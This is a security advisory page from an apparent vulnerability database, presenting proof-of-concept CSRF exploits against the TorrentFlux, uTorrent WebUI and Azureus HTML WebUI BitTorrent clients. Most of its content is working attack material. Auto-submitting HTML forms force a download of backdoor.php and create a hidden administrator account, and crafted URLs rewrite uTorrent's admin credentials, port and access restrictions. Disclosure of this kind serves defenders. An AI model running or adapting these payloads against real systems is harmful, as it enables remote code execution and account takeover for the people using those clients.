|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 5523 CVE : CVE-2008-6584 CVE : CVE-2008-6585 CVE : CVE-2008-6586 CVE : CVE-2008-6587 CWE : CWE-94 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : th3 r00k Published : 06.04.2009
Advisory Content : The following are proof of concept exploits against three bittorrent clients. uTorrent' WebUI, Azurues's "HTML WebUI", and TorrentFlux. More information: http://www.rooksecurity.com/blog/?p=10 TorrentFlux v2.3(Latest) http://sourceforge.net/projects/torrentflux/ If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here: http://localhost/torrentflux_2.3/html/downloads/USER_NAME/ You do not have to know a password to access this folder, but you will have to know the username. <html> <form id='file_attack' method="post" action="http://localhost/torrentflux_2.3/html/index.php"> <input type=hidden name="url_upload" value="http://localhost/backdoor.php.torrent"> <input type=submit value='file attack'> </from> <html> <script> document.getElementById('file_attack').submit(); </script> <html> Add an admistrative account: <form id=?create_admin? method=?post? action=?http://localhost/torrentflux_2.3/html/admin.php?op=addUser?> <input type=hidden name=?newUser? value=?sadmin?> <input type=hidden name=?pass1″ value=?password?> <input type=hidden name=?pass2″ value=?password?> <input type=hidden name=?userType? value=1> <input type=submit value=?create admin?> </form> </html> <script> document.getElementById(?create_admin?).submit(); </script> uTorrent?s WebUI is also affected: http://forum.utorrent.com/viewtopic.php?id=14565 force file download: http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.to rrent utorrent change administrative login information: http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096 After the username or password have been changed then the browser must re-authenticate. http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0. 1/24,10.1.1.1 So is Azurues?s HTML WebUI: Force file download: http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.tor rent References : http://xforce.iss.net/xforce/xfdb/41925
http://www.securityfocus.com/bid/28846
http://www.securityfocus.com/archive/1/archive/1/491066/100/0/threaded
http://secunia.com/advisories/29935
http://osvdb.org/44645  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |